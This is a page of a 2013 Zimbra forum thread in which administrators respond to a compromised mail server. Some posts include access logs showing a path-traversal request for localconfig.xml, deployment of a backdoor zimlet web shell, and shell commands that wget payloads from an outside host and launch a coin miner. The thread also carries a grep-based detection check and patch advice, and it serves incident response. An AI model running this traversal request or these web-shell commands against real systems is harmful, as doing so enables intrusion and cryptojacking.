Page 3 of 4 FirstFirst 1234 LastLast
Results 21 to 30 of 38

Thread: zimbra 0-day

  1. #21
    nrc
    nrc is online now Active Member
    Join Date
    Mar 2007
    Location
    Columbus, OH
    Posts
    26
    Rep Power
    8

    Default

    Quote Originally Posted by JakeMS View Post
    I've just checked my previous post.

    It would seem vBulletin scrapped most of the URL.
    Ah! That makes more sense. Yes, I believe what you're seeing now is the expected response from an API request. I still see the same thing with version 8.0.6.

  2. #22
    sugiggs is offline Loyal Member
    Join Date
    Sep 2009
    Posts
    99
    Rep Power
    5

    Default

    Other than the obvious "upgrade to the latest version", any other way to "patch" this?

    I have one installation still using version 6

  3. #23
    mathx2 is offline New Member
    Join Date
    Dec 2013
    Posts
    4
    Rep Power
    1

    Default

    So a customer box has a rogue coin miner running on it (mining dogecoin, of all things) under the Zimbra user. I assume this is due to this CVE-2013-7217 0-day exploit.

    I assume once the exploit has been launched, that abitrary code execution is possible. However, they didnt run it as root, but as zimbra user, suggesting they didnt root the box (though that's just one local racecondition exploit away, right?)

    Until I can reinstall the server from scratch (what everyone wants to do over the holidays after paying for an expensive piece of software, amirite?), if the machine is already exploited at the zimbra user level, what is the work around? Firewalled off the admin port already, dont think I can move off port 80 for them (without impacting production). Is the zimbra user password compromised? (I dont see ssh logins, for eg, but who knows). Are they going through login(1) either through ssh or otherwise? (Can we safely change the zimbra password? or the shell? I bet not, many crontab bits probably required it, though SHELL= could be set).

    Suggestions welcome. (Usually I post under mathx but I cant recover my password - Zimbra doesnt seem to have their mailservers anti-spam compliant, and their helo doesnt reverse - which is kinda ridiculous for a mail server software company, ya?)
    Last edited by mathx2; 12-30-2013 at 02:01 AM.

  4. #24
    Hien is offline New Member
    Join Date
    Dec 2013
    Location
    HCMC, Viet Nam
    Posts
    4
    Rep Power
    1

    Default

    Quote Originally Posted by mathx2 View Post
    So a customer box has a rogue coin miner running on it (mining dogecoin, of all things) under the Zimbra user. I assume this is due to this CVE-2013-7217 0-day exploit.

    I assume once the exploit has been launched, that abitrary code execution is possible. However, they didnt run it as root, but as zimbra user, suggesting they didnt root the box (though that's just one local racecondition exploit away, right?)

    Until I can reinstall the server from scratch (what everyone wants to do over the holidays after paying for an expensive piece of software, amirite?), if the machine is already exploited at the zimbra user level, what is the work around? Firewalled off the admin port already, dont think I can move off port 80 for them (without impacting production). Is the zimbra user password compromised? (I dont see ssh logins, for eg, but who knows). Are they going through login(1) either through ssh or otherwise? (Can we safely change the zimbra password? or the shell? I bet not, many crontab bits probably required it, though SHELL= could be set).

    Suggestions welcome. (Usually I post under mathx but I cant recover my password - Zimbra doesnt seem to have their mailservers anti-spam compliant, and their helo doesnt reverse - which is kinda ridiculous for a mail server software company, ya?)
    Hello,

    Attacker can deploy malicious zimlets . Please check your deployed zimlets in /opt/zimbra/zimlets-deployed/ carefully.

    For example: find /opt/zimbra/zimlets-deployed/ -type f -name "*.jsp" -exec grep "Runtime.getRuntime().exec" {} \;

    Also please check logs at /opt/zimbra/log , you will get similar log if you got attacked by this exploit:

    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:08 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 3
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:10 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 6
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:11 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1230 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 20
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:13 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 6
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:14 +0000] "POST /service/admin/soap HTTP/1.1" 200 20677 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 5
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:18 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 4
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:22 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 255 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 71
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:25 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 257 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2


    HTH.

  5. #25
    ljramos is offline Active Member
    Join Date
    Aug 2007
    Location
    Delaware USA
    Posts
    39
    Rep Power
    8

    Default

    I have the same issue. is there a patch/fix for version 6.0_16

  6. #26
    mathx2 is offline New Member
    Join Date
    Dec 2013
    Posts
    4
    Rep Power
    1

    Default

    Quote Originally Posted by Hien View Post
    Hello,

    Attacker can deploy malicious zimlets . Please check your deployed zimlets in /opt/zimbra/zimlets-deployed/ carefully.

    For example: find /opt/zimbra/zimlets-deployed/ -type f -name "*.jsp" -exec grep "Runtime.getRuntime().exec" {} \;

    Also please check logs at /opt/zimbra/log , you will get similar log if you got attacked by this exploit:

    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:08 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 3
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:10 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 6
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:11 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1230 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 20
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:13 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 6
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:14 +0000] "POST /service/admin/soap HTTP/1.1" 200 20677 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 5
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:18 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 4
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:22 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 255 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 71
    access_log.2013-12-28:179.43.141.149 - - [28/Dec/2013:02:11:25 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 257 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2


    HTH.
    it does help, looks like this is the case (see logs at bottom of post)
    AND its the same IP as yours (!!).

    meanwhile, i see nothing new or otherwise in /opt/zimbra/zimlets, so theyve managed run code locally through some other action. This would suggest that the hole is WORSE than described. Isnt just people reading mail and changing passwords, but with the ability to run local code as well. Isnt quite a remote root exploit, but that's academic with any racecondition toolkit.

    Can we get a reply from a zimbra employee up in here?

    Yeah you can see it clearly, they wget and install meep.pl then chmod it and it eventually runs. Pretty clever.

    patched the server with the .tgz but Im thinking I need to reinstall entirely to be safe > not a good xmas present!



    179.43.141.149 - - [28/Dec/2013:20:51:34 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 404 1414 "-" "WWW-Mechanize/1.73" 4
    179.43.141.149 - - [28/Dec/2013:20:51:35 +0000] "GET /res/TemplateMsg.js.zgz?skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 1284 "-" "Mozilla/5.0 (X11; Li
    nux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" 2
    179.43.141.149 - - [28/Dec/2013:20:51:35 +0000] "POST /service/admin/soap HTTP/1.1" 200 487 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Sa
    fari/537.36" 13
    179.43.141.149 - - [28/Dec/2013:20:51:36 +0000] "POST /service/admin/soap HTTP/1.1" 200 40514 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57
    Safari/537.36" 166
    179.43.141.149 - - [28/Dec/2013:20:51:39 +0000] "POST /service/upload HTTP/1.1" 200 242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari
    /537.36" 8
    179.43.141.149 - - [28/Dec/2013:20:51:41 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 254 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ch
    rome/31.0.1650.57 Safari/537.36" 89
    179.43.141.149 - - [28/Dec/2013:20:51:44 +0000] "POST /service/admin/soap/DeployZimletRequest HTTP/1.1" 200 256 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ch
    rome/31.0.1650.57 Safari/537.36" 4
    179.43.141.149 - - [28/Dec/2013:20:51:49 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 200 184 "-" "WWW-Mechanize/1.73" 2474
    179.43.141.149 - - [28/Dec/2013:20:51:52 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp HTTP/1.1" 200 184 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/
    cmd.jsp" "WWW-Mechanize/1.73" 4
    179.43.141.149 - - [28/Dec/2013:20:51:52 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2 FCFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fmeep.pl HT
    TP/1.1" 200 255 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp" "WWW-Mechanize/1.73" 1045
    179.43.141.149 - - [28/Dec/2013:20:51:54 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2 FCFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa HTTP/1.1" 2
    00 246 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2 FCFIDE%2Fmeep+-O+%2Fvar%2Ftmp%2Fmeep.pl" "WWW-Mechanize/1.73" 890
    179.43.141.149 - - [28/Dec/2013:20:51:55 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2 FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb HTTP/1.1" 2
    00 246 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2 FCFIDE%2Fa+-O+%2Fvar%2Ftmp%2Fa" "WWW-Mechanize/1.73" 1355
    179.43.141.149 - - [28/Dec/2013:20:51:57 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar %2Ftmp%2Fb HTTP/1.1" 200 228 "https://199.
    27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=wget+http%3A%2F%2F74.114.204.122%2 FCFIDE%2Fb+-O+%2Fvar%2Ftmp%2Fb" "WWW-Mechanize/1.73" 24
    179.43.141.149 - - [28/Dec/2013:20:51:58 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=%2Fvar%2Ftmp%2Fa%20-B%20-o%20stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A53%2 0
    -u%20ilovebigdongs.1%20-p%20x%0A HTTP/1.1" 500 8498 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar %2Ftmp%2Fb" "WWW-Mecha
    nize/1.73" 15
    179.43.141.149 - - [28/Dec/2013:20:52:09 +0000] "GET /zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=%2Fvar%2Ftmp%2Fa%20-B%20-o%20stratum%2Btcp%3A%2F%2Fhecks.ddosdev.com%3A3334 %20-u%20ilovebigdongs.1%20-p%20x HTTP/1.1" 500 8498 "https://199.27.180.147/zimlet/com_zimbra_example_simplejspaction/cmd.jsp?comment=chmod+%2Bx+%2Fvar%2Ftmp%2Fa+%2Fvar %2Ftmp%2Fb" "WWW-Mechanize/1.73" 13


    Last edited by mathx2; 12-30-2013 at 12:22 PM.

  7. #27
    mathx2 is offline New Member
    Join Date
    Dec 2013
    Posts
    4
    Rep Power
    1

    Default

    In case you all didnt clue in, and apparently no one did because my post is still there _AND_ no one has commented, but I've just inadvertently released the entire method of compromise right down to executing code from remote.

    Dont know if you want to remove that post, that's up to you, though I believe in full disclosure to ensure people fix things.

    You might need to get your zimbra outbound mailserver reverse DNS fixed however to be able to contact some of your customers. I didnt get the warning email because of it. (Funny to think that the exploit could be used to patch vulnerable servers too, in fact!)

  8. #28
    Hien is offline New Member
    Join Date
    Dec 2013
    Location
    HCMC, Viet Nam
    Posts
    4
    Rep Power
    1

    Default

    Hello mathx2,

    In your log, Attacker deployed new zimlet named "com_zimbra_example_simplejspaction" on your zimbra server as backdoor .Directtory need to be checked is "/opt/zimbra/zimlets-deployed/"

    HTH.

  9. #29
    quanah is offline Zimbra Employee
    Join Date
    May 2007
    Location
    Zimbra
    Posts
    1,285
    Rep Power
    10

    Default

    The RDNS issue should be fixed at this point, thanks
    Quanah Gibson-Mount
    Server Architect
    Zimbra, Inc
    --------------------
    Zimbra :: the leader in open source messaging and collaboration

  10. #30
    nrc
    nrc is online now Active Member
    Join Date
    Mar 2007
    Location
    Columbus, OH
    Posts
    26
    Rep Power
    8

    Default

    Quote Originally Posted by mathx2 View Post
    In case you all didnt clue in, and apparently no one did because my post is still there _AND_ no one has commented, but I've just inadvertently released the entire method of compromise right down to executing code from remote.
    The initial compromise appears to be the same as the one originally reported and patched. Once that vulnerability is exploited and a privileged account is created there are all sorts of things they can do with that. In your case they deployed a Zimlet which allowed them to execute arbitrary code. As Hien pointed out the trojan Zimlet is com_zimbra_example_simplejspaction. You should check for that and also check for and remove the account that was created.

    To address your earlier question, you don't need to move from port 80, you just need to update to the recommended versions to close the original vulnerability. 7.2.6 or 8.0.6 are strongly recommended since they close another as yet undisclosed vulnerability. See the two posts below for more info.

    Security Guidance for reported "0day Exploit"
    Critical Security Vulnerability Addressed in 7.2.6/8.0.6 Maintenance Releases

Page 3 of 4 FirstFirst 1234 LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •